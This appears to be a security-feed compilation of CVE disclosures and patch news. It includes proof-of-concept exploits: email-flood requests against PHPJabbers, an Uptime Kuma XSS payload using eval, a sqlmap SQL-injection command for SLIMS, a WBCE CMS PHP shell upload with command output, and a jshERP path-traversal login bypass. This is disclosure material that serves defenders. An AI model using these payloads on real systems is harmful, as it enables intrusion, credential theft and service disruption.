PHPJabbers Car Rental version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Car Rental v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48834Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701528105_124/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701528105_124/index.php?controller=pjBaseOptions&action=pjActionEmailSettings&err=PBS03Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48834)

PHPJabbers Car Rental 3.0 Missing Rate Limit

PHPJabbers Time Slots Booking Calendar version 4.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - No RateLimit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48833Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701527883_624/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48833)

PHPJabbers Time Slots Booking Calendar 4.0 Missing Rate Limiting

PHPJabbers Availability Booking Calendar version 5.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - NoRate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48831Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701526313_862/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: localhostCookie: _ga=GA1.2.1947184974.1699512498;_fbp=fb.1.1699512498084.844079488;_ga_NME5VTTGTT=GS1.2.1701527599.5.1.1701527608.51.0.0;_gcl_au=1.1.1109346785.1700383352;_hjSessionUser_2841064=eyJpZCI6ImVlNjRmZTlkLTlmMDAtNWJmMC05OTk1LWE4ODQzMmNiMGQ0OSIsImNyZWF0ZWQiOjE3MDAzODMzNTQyMDYsImV4aXN0aW5nIjp0cnVlfQ==;pj_sid=PJ1.0.3350592650.1700383356; pj_so=PJ1.0.9822262006.1700383356;CarRental=pb6krbqhp0ugdgduc39iagulp2; pjd=fmfk4mh95jvo519v16tcbmfte4;PHPSESSID=91h58pp95vek8qpp4jj62srb23;ShuttleBooking=uhei7cs26l7eoen1bfja4ciaq2;TSBCalendar=k2502gveirj5nhpo9ofnbpnrv2;ABCalendar=lkoj2qi9cq5dib87qothkc9d77;_gid=GA1.2.1184409840.1701527598; _gat=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48831)

PHPJabbers Availability Booking Calendar 5.0 Missing Rate Limiting

Uptime Kuma is an open source self-hosted monitoring tool. In affected versions the Google Analytics element in vulnerable to Attribute Injection leading to Cross-Site-Scripting (XSS). Since the custom status interface can set an independent Google Analytics ID and the template has not been sanitized, there is an attribute injection vulnerability here, which can lead to XSS attacks. This vulnerability has been addressed in commit `f28dccf4e` which is included in release version 1.23.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Summary**

Google Analytics element Attribute Injection leading to XSS

**Details**

Since the custom status interface can set an independent Google Analytics ID and the template has not been sanitized, there is an attribute injection vulnerability here, which can lead to XSS attacks.  

**PoC**

1.  Run the latest version of the louislam/uptime-kuma container and initialize the account password.
2.  Create a new status page.
3.  Edit the status page and change the Google Analytics ID to following payload(it only works for firefox. Any attribute can be injected, but this seems the most intuitive):

    123123" onafterscriptexecute=alert(window.name+1),eval(window.name) a="x
    

4.  Click Save and return to the interface. XSS occurs.  
    screenshots:

CVE-2023-49276: Attribute Injection leading to XSS(Cross-Site-Scripting)

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/staff_act.php.

**The Bug**

A SQL Injection exists in admin/modules/reporting/customs/staff_act.php at the code below

	// create datagrid
	$reportgrid = new report\_datagrid();
	$reportgrid\->setSQLColumn('u.realname AS \\''.\_\_('Real Name').'\\'',
    	'u.username AS \\''.\_\_('Login Username').'\\'',
    	'u.user\_id AS \\''.\_\_('Bibliography Data Entry').'\\'',
    	'u.user\_id AS \\''.\_\_('Item Data Entry').'\\'',
    	'u.user\_id AS \\''.\_\_('Member Data Entry').'\\'',
    	'u.user\_id AS \\''.\_\_('Loans').'\\'',
    	'u.user\_id AS \\''.\_\_('Returns').'\\'',
    	'u.user\_id AS \\''.\_\_('Extends').'\\'');
	$reportgrid\->setSQLorder('realname ASC');

	// is there any search
	$criteria = 'user\_id IS NOT NULL ';
	$reportgrid\->setSQLCriteria($criteria);

	$start\_date = '2000-01-01';
	if (isset($\_GET\['startDate'\])) {
    	$start\_date = $\_GET\['startDate'\]; // unsanitized input 1
	}
	$until\_date = date('Y-m-d');
	if (isset($\_GET\['untilDate'\])) {
    	$until\_date = $\_GET\['untilDate'\]; // unsanitized input 2
	}

**To Reproduce**  
Steps to reproduce the behavior:

1.  Login as admin or user that has access to Staff Activity Reporting
2.  Make sure the burp is on to capture the request as below

3.  Save the request into a file (example.req)
4.  Run the test with sqlmap with the command
    
        sqlmap command:
        sqlmap -r example.req --level 5 --risk 3 -p startDate --random-agent --dbms=mysql --current-user
        
    
5.  It's in  
    

**example.req**

    GET /slims9_bulian-9.6.1/admin/modules/reporting/customs/staff_act.php?startDate=2000-01-01&untilDate=2023-08-2&applyFilter=Apply+Filter&reportView=true HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=reporting
    Cookie: SenayanAdmin=68n7ojemg853g6ipos463oo2o2; admin_logged_in=1; SenayanMember=nva8k0bovrr32qckn46cs9u46h
    Upgrade-Insecure-Requests: 1
    

**Screenshots**

**proof-of-concept current user**  

**Versions**

*   OS: Windows
*   Browser: Firefox | 116.0.3 (64-bit)
*   Slims Version: slims9\_bulian-9.6.1

**Notes**

CVE-2023-48893: Vuln0wned Report: SQL Injection in staff_act.php · Issue #209 · slims/slims9_bulian

WBCE CMS version 1.6.1 suffers from a remote shell upload vulnerability.

# Exploit Title: WBCE CMS Version : 1.6.1  Remote Command Execution  
# Date: 30/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip  
# Version: 1.6.1  
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1 ) Login with admin cred and click Add-ons  
2 ) Click on Language > Install Language  > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php  
4 ) You will be see id command result 

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 

### Post Request:

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1  
Host: demos6.softaculous.com  
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459  
Content-Length: 522  
Origin: https://demos6.softaculous.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"  
Content-Type: application/x-php

<?php echo system('id'); ?>

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="submit"

-----------------------------86020911415982314764024459--

### Response : 



  
<div class="row" style="overflow:visible">  
<div class="fg12">  
<table id="former_positioning_table">  
<tr>  
    <td class="content">  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
    <div class="top alertbox_error fg12 error-box">  
        <i class=" fa fa-2x fa-warning signal"></i>

                    <p>Invalid WBCE CMS language file. Please check the text file.</p>

                            <p><a href="index.php" class="button">Back

WBCE CMS 1.6.1 Shell Upload

Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.
The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

CVE-2023-42916 - An out-of-bounds read issue that could be exploited to

Spyware / Threat Analysis

Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.

The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

*   **CVE-2023-42916** - An out-of-bounds read issue that could be exploited to leak sensitive information when processing web content.
*   **CVE-2023-42917** - A memory corruption bug that could result in arbitrary code execution when processing web content.

Apple said it's aware of reports exploiting the shortcomings "against versions of iOS before iOS 16.7.1," which was released on October 10, 2023. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the twin flaws.

The iPhone maker did not provide additional information regarding ongoing exploitation, but previously disclosed zero-days in iOS have been used to deliver mercenary spyware targeting high-risk individuals, such as activists, dissidents, journalists, and politicians.

It's worth pointing out here that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, are powered by the WebKit rendering engine due to restrictions imposed by Apple, making it a lucrative and broad attack surface.

The updates are available for the following devices and operating systems -

*   **iOS 17.1.2 and iPadOS 17.1.2** - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
*   **macOS Sonoma 14.1.2** - Macs running macOS Sonoma
*   **Safari 17.1.2** - Macs running macOS Monterey and macOS Ventura

With the latest security fixes, Apple has remediated as many as 19 actively exploited zero-days since the start of 2023. It also comes days after Google shipped fixes for a high-severity flaw in Chrome (CVE-2023-6345) that has also come under real-world attacks, making it the seventh zero-day to be patched by the company this year.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zero-Day Alert: Apple Rolls Out iOS, macOS, and Safari Patches for 2 Actively Exploited Flaws

Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.

1.The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java,and the affected function is doFilter.

In the filter code, use servletRequest.getRequestURI() to obtain the request path, and then determine whether the path contains /doc.html, /user/login, /user/register. If so, execute chain.doFilter(request, response) to skip this filter. Else, continue to check.

Then determine whether the path startswith allowUrls. If so, execute chain.doFilter(request, response) to skip this filter.

See the screenshot below for the value of allowUrls  
  

2.The problem lies in using servletRequest.getRequestURI() to obtain the request path. The path obtained by this function will not parse special symbols, but will be passed on directly, so you can use ../ to bypass it. Taking one of the backend interfaces /jshERP-boot/user/getAllList as an example, using /user/login/../../jshERP-boot/user/getAllList can make it satisfy requestUrl.contains("/user/login" ), and at the same time, it can request the getAllList interface to achieve login bypass.

3.The Poc is as follows:

    GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
    Host: 192.168.124.1:9999
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    

When accessing the /jshERP-boot/user/getAllList interface directly, it will return "loginOut".  

When accessing the /user/login/../../jshERP-boot/user/getAllList interface, the user information can be obtained by bypassing the access control,whice also includes user passwords.

CVE-2023-48894: There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system · Issue #98 · jishenghua/jshERP

Plus: Major security patches from Microsoft, Mozilla, Atlassian, Cisco, and more.

The holiday season is here, but software firms are still busy issuing fixes for major security flaws. Microsoft, Google, and enterprise software firm Atlassian have released patches for vulnerabilities already being used in attacks. Cisco also patched a bug deemed so serious, it was given a near-maximum CVSS score of 9.9.

Here’s everything you need to know about the patches released in November.

Google Chrome

Google ended November with a bang after issuing seven security fixes for Chrome, including an emergency patch for an issue already being used in real-life attacks. Tracked as CVE-2023-6345, the already exploited flaw is an integer overflow issue in Skia, an open source 2D graphics library. “Google is aware that an exploit for CVE-2023-6345 exists in the wild,” the browser maker said in an advisory.

Little is known about the fix at the time of writing; however, it was reported by Benoît Sevens and Clément Lecigne of Google's Threat Analysis Group, indicating the exploit could be spyware-related.

The six other flaws fixed by Google and rated as having a high impact include CVE-2023-6348, a type-confusion bug in Spellcheck, and CVE-2023-6351, a use-after-free issue in libavif.

Earlier in the month, Google released fixes for 15 security issues in its widely used browser. Among the bugs fixed by the software giant are three rated as having a high severity. Tracked as CVE-2023-5480, the first is an inappropriate implementation issue in Payments, while the second, CVE-2023-5482, is an insufficient data validation flaw in USB with a CVSS score of 8.8. The third high-severity bug, CVE-2023-5849, is an integer overflow issue in USB.

Mozilla Firefox

Chrome competitor Firefox has fixed 10 vulnerabilities in the browser, six of which are rated as having a high impact. CVE-2023-6204 is an out-of-bound memory access flaw in WebGL2 blitFramebuffer, while CVE-2023-6205 is a use-after-free issue in MessagePort.

Meanwhile, CVE-2023-6206 could allow clickjacking permission prompts using the full-screen transition. “The black fade animation when exiting full screen is roughly the length of the anti-clickjacking delay on permission prompts,” Firefox owner Mozilla said. “It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear.”

CVE-2023-6212 and CVE-2023-6212 are Memory safety bugs, both with a CVSS score of 8.8, in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5.

Google Android

Google's November Android Security Bulletin details fixes patched in this month, including eight in the Framework, six of which are elevation of privilege bugs. The worst flaw could lead to local escalation of privilege with no additional execution privileges needed, Google said in an advisory.

Google also fixed seven issues in the System, six of which are rated as having a high severity and one marked as critical. Tracked as CVE-2023-40113, the critical bug could lead to local information disclosure with no additional execution privileges needed.

Google's Pixel devices have already received the November update, along with some additional fixes. The November Android Security Bulletin has also started to roll out to some of Samsung’s Galaxy line.

Microsoft

Microsoft has a Patch Tuesday every month, but November's is worth notice. The update fixes 59 vulnerabilities, two of which are already being exploited in real-life attacks. Tracked as CVE-2023-36033, the first is an elevation of privilege vulnerability in Windows DWM Core Library marked as important, with a CVSS score of 7.8. “An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,” Microsoft said.

Meanwhile, CVE-2023-36036 is an elevation of privilege vulnerability in Windows Cloud Files Mini Filter Driver with a CVSS score of 7.8. Also fixed in November’s update cycle is the already exploited libWep flaw previously fixed in Chrome and other browsers, which also impacts Microsoft’s Edge, tracked as CVE-2023-4863.

Another notable flaw is CVE-2023-36397, a remote code execution vulnerability in Windows Pragmatic General Multicast marked as critical with a CVSS score of 9.8. “When Windows message queuing service is running in a PGM Server environment, an attacker could send a specially crafted file over the network to achieve remote code execution and attempt to trigger malicious code,” Microsoft said.

Cisco

Enterprise software firm Cisco has issued fixes for 27 security flaws, including one rated as critical with a near maximum CVSS score of 9.9. Tracked as CVE-2023-20048, the vulnerability in the web services interface of Cisco Firepower Management Center Software could allow an authenticated, remote attacker to execute unauthorized configuration commands on a Firepower Threat Defense device managed by the FMC Software.

However, to successfully exploit the vulnerability, an attacker would need valid credentials on the FMC Software, Cisco said.

A further seven of the flaws fixed by Cisco are rated as having a high impact, including CVE-2023-20086—a denial-of-service flaw with a CVSS score of 8.6—and CVE-2023-20063, a code-injection vulnerability with a CVSS score of 8.2.

Atlassian

Atlassian has released a patch to fix a serious flaw already being used in real-life attacks. Tracked as CVE-2023-22518, the improper-authorization vulnerability issue in Confluence Data Center and Server is being used in ransomware attacks. “As part of Atlassian's ongoing monitoring and investigation of this CVE, we observed several active exploits and reports of threat actors using ransomware,” it said.

Security outfit Trend Micro reported the Cerber ransomware group is using the flaw in attacks. “This is not the first time that Cerber has targeted Atlassian—in 2021, the malware re-emerged after a period of inactivity and focused on exploiting remote code execution vulnerabilities in Atlassian's GitLab servers,” Trend Micro said.

All versions of Confluence Data Center and Server are affected by the flaw, which allows an unauthenticated attacker to reset Confluence and create an administrator account. “Using this account, an attacker can perform all administrative actions available to a Confluence instance administrator, leading to a full loss of confidentiality, integrity and availability,” Atlassian said.

SAP

Enterprise software giant SAP has released its November Security Patch Day, fixing three new flaws. Tracked as CVE-2023-31403 and with a CVSS score of 9.6, the most serious issue is an improper access control vulnerability flaw in SAP Business One. As a result of exploiting the issue, a malicious user could read and write to the SMB shared folder, the software giant said.

Google Fixes a Seventh Zero-Day Flaw in Chrome—Update Now

Red Hat Security Advisory 2023-7577-01 - An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7577.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2023:7577-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7577  
Issue date:         2023-11-29  
Revision:           01  
CVE Names:          CVE-2023-6204  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.5.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bound memory access in WebGL2 blitFramebuffer (CVE-2023-6204)

* Mozilla: Use-after-free in MessagePort::Entangled (CVE-2023-6205)

* Mozilla: Clickjacking permission prompts using the fullscreen transition (CVE-2023-6206)

* Mozilla: Use-after-free in ReadableByteStreamQueueEntry::Buffer (CVE-2023-6207)

* Mozilla: Memory safety bugs fixed in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5 (CVE-2023-6212)

* Mozilla: Using Selection API would copy contents into X11 primary selection. (CVE-2023-6208)

* Mozilla: Incorrect parsing of relative URLs starting with \"///\" (CVE-2023-6209)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6204

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2250896  
https://bugzilla.redhat.com/show_bug.cgi?id=2250897  
https://bugzilla.redhat.com/show_bug.cgi?id=2250898  
https://bugzilla.redhat.com/show_bug.cgi?id=2250899  
https://bugzilla.redhat.com/show_bug.cgi?id=2250900  
https://bugzilla.redhat.com/show_bug.cgi?id=2250901  
https://bugzilla.redhat.com/show_bug.cgi?id=2250902

Tag

#firefox